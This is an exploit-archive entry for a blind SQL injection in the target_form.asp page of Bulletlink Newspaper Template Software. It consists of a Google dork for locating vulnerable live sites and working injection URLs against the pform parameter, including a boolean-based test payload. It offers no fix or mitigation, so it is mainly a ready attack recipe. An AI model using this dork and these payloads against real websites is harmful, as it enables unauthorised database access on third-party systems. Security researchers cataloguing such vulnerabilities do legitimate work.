Bulletlink Newspaper Template Software suffers from a remote blind SQL injection vulnerability.
527bb82149fa2030ec271de2c72a2f14ca5303161e6ee49e8b2c97cf661c157a
# Exploit Title: Bulletlink Newspaper Template Software
(target_form.asp) 0day Blind SQL-Injection
# Date: 09/11/2011
# Author: easypwn
# Vendor or Software Link: http://www.bulletlink.com
# Category: webapps
# Google dork: allinurl:target_form.asp?pform=
# Tested on: Windows 2000, Windows 2003, Windows 2008. (Microsoft SQL Server)
PoC: http://localhost/target_form.asp?pform={{DeleteMember}}'SQLi
Demo: http://localhost/target_form.asp?pform={{DeleteMember}}'%20AND%208589=8589%20AND%20'pRKy'='pRKy